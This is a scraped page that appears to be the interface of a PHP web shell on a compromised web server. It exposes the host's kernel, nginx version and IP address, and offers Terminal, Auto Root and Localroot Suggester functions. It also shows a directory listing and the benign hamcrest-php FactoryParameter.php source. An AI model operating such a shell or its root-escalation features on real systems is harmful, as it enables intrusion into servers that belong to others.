Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.44
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
hamcrest /
hamcrest-php /
generator /
Delete
Unzip
Name
Size
Permission
Date
Action
parts
[ DIR ]
drwxr-xr-x
2016-01-20 09:00
FactoryCall.php
611
B
-rw-r--r--
2016-01-20 09:00
FactoryClass.php
1.47
KB
-rw-r--r--
2016-01-20 09:00
FactoryFile.php
3.03
KB
-rw-r--r--
2016-01-20 09:00
FactoryGenerator.php
2.68
KB
-rw-r--r--
2016-01-20 09:00
FactoryMethod.php
5.52
KB
-rw-r--r--
2016-01-20 09:00
FactoryParameter.php
1.73
KB
-rw-r--r--
2016-01-20 09:00
GlobalFunctionFile.php
931
B
-rw-r--r--
2016-01-20 09:00
StaticMethodFile.php
773
B
-rw-r--r--
2016-01-20 09:00
run.php
1.06
KB
-rw-r--r--
2016-01-20 09:00
Save
Rename
<?php /* Copyright (c) 2009 hamcrest.org */ class FactoryParameter { /** * @var FactoryMethod */ private $method; /** * @var ReflectionParameter */ private $reflector; public function __construct(FactoryMethod $method, ReflectionParameter $reflector) { $this->method = $method; $this->reflector = $reflector; } public function getDeclaration() { if ($this->reflector->isArray()) { $code = 'array '; } else { $class = $this->reflector->getClass(); if ($class !== null) { $code = '\\' . $class->name . ' '; } else { $code = ''; } } $code .= '$' . $this->reflector->name; if ($this->reflector->isOptional()) { $default = $this->reflector->getDefaultValue(); if (is_null($default)) { $default = 'null'; } elseif (is_bool($default)) { $default = $default ? 'true' : 'false'; } elseif (is_string($default)) { $default = "'" . $default . "'"; } elseif (is_numeric($default)) { $default = strval($default); } elseif (is_array($default)) { $default = 'array()'; } else { echo 'Warning: unknown default type for ' . $this->getMethod()->getFullName() . PHP_EOL; var_dump($default); $default = 'null'; } $code .= ' = ' . $default; } return $code; } public function getInvocation() { return '$' . $this->reflector->name; } public function getMethod() { return $this->method; } }